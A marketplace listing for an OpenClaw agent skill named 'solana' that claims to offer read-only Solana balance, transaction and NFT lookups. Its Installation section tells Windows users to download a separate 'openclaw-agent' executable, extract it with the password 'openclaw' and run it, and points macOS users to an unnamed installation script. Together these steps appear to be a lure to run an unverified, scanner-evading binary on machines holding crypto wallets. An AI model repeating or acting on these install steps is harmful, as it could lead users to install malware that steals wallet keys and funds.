solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Integrate Solana blockchain capabilities into OpenClaw. Track SOL balances, view transactions, inspect SPL tokens, and analyze NFT metadata directly from your agent.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-t1nyqWhat This Skill Does
The Solana skill enables the OpenClaw AI agent to interface directly with the Solana blockchain. It acts as a comprehensive command-line bridge, allowing users to query account balances, inspect transaction histories, monitor NFT metadata via Metaboss, and interact with SPL tokens. By leveraging the openclaw-agent utility, this skill transforms natural language queries into precise blockchain commands, making it easier than ever to track wallet assets, manage stakes, or debug account data on the Solana network.
Installation
To utilize this skill, you must first ensure the openclaw-agent is operational on your host machine.
- Windows: Download the openclaw-agent executable from the official repository, extract it using the password 'openclaw', and run the binary.
- macOS: Use the provided installation script found in the documentation to prepare your terminal environment.
- Skill Install: Execute
clawhub install openclaw/skills/skills/hightower6eu/solana-t1nyqwithin your OpenClaw environment. - Prerequisites: Ensure the Solana CLI toolset is installed on your system path and your RPC endpoint is configured to point to the mainnet-beta for live data.
Use Cases
- Asset Tracking: Periodically monitor the balance of multiple wallets or track specific SPL token holdings.
- Account Auditing: Quickly pull detailed JSON account data to investigate the state of a specific address.
- NFT Research: Decode NFT mint addresses to verify ownership, metadata, and collection traits.
- Transaction Verification: Verify the status of recent transactions using signature confirmation to ensure on-chain finality.
- Staking Management: Review active stake accounts and rewards associated with a specific address.
Example Prompts
- "Check the current SOL balance and recent transaction history for wallet address 4t6y..."
- "What are the current SPL token balances held by my account at [address]?"
- "Decode the metadata for the NFT with mint address [address] and tell me its attributes."
Tips & Limitations
- RPC Reliability: Always configure a custom RPC provider if you plan on making high-frequency queries to avoid rate-limiting on public nodes.
- Security: Never share private keys or seed phrases with the agent. This skill is designed for read-only data analysis.
- Dependency Management: Ensure your system's
metabossandsolana-cliversions are kept up to date to maintain compatibility with shifting blockchain standards. - Network Context: Be aware of which network (mainnet, devnet, testnet) your CLI is pointed at before running critical queries to avoid 'data not found' errors.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-t1nyq": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.